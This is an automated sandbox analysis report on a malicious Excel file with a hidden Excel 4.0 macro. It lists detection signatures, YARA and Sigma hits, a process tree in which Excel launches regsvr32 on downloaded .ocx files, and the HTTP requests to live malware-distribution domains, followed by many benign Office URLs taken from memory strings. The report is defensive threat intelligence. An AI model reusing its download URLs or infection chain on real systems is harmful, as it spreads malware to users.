Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Sample Name:counter-1248368226.xls
Analysis ID:532597
MD5:30a0db47a66a3d3173457755bb166529
SHA1:c852a219defe8ab726b72f8792386e35428b46dc
SHA256:bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected potential crypto function
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 2256 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 2276 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3108 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4340 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
counter-1248368226.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x1deaa:$s1: Excel
  • 0x1ef56:$s1: Excel
  • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
counter-1248368226.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\counter-1248368226.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x1deaa:$s1: Excel
    • 0x1ef56:$s1: Excel
    • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\counter-1248368226.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2256, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2276

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: counter-1248368226.xlsReversingLabs: Detection: 40%
      Antivirus detection for URL or domainShow sources
      Source: https://playsis.com.br/qJSL1BN5V/tiynh.htmlAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/Avira URL Cloud: Label: malware
      Source: https://playsis.com.br/RAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BNsAvira URL Cloud: Label: malware
      Source: https://playsis.com.br/qJSL1BN5V/tiynh.htmlvn/TSh7GBeIR/tiynh.htmlAvira URL Cloud: Label: malware
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.3:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.3:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.3:49745 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.3:49743 -> 108.179.192.98:443
      Source: global trafficDNS query: name: greenflag.esp.br
      Source: global trafficTCP traffic: 192.168.2.3:49743 -> 108.179.192.98:443
      Source: global trafficHTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: greenflag.esp.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: noithat117.vnConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: playsis.com.brConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 162.241.2.78 162.241.2.78
      Source: Joe Sandbox ViewIP Address: 108.179.192.98 108.179.192.98
      Source: Joe Sandbox ViewIP Address: 103.28.36.171 103.28.36.171
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: EXCEL.EXE, 00000001.00000003.476275279.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488859590.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467843202.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462582747.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419978341.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.340031882.000000000FE23000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610899653.000000000FE23000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides/O
      Source: EXCEL.EXE, 00000001.00000002.608087011.000000000E08E000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000001.00000002.608049076.000000000E06A000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tabler
      Source: EXCEL.EXE, 00000001.00000003.469607881.0000000016ABE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.470048142.000000001690E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455964384.0000000016B06000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455940301.0000000016AD6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000001.00000003.469607881.0000000016ABE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.470048142.000000001690E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455964384.0000000016B06000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455940301.0000000016AD6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxNS
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging1
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloade
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedB
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated6
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryv
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiE
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appinfo/queryg
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.cortana.ai
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com?V
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comHV
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhuc
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt9H
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net&s
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net/s
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net9rh
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net=sl
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netLr
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netls
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netyp(
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netzs
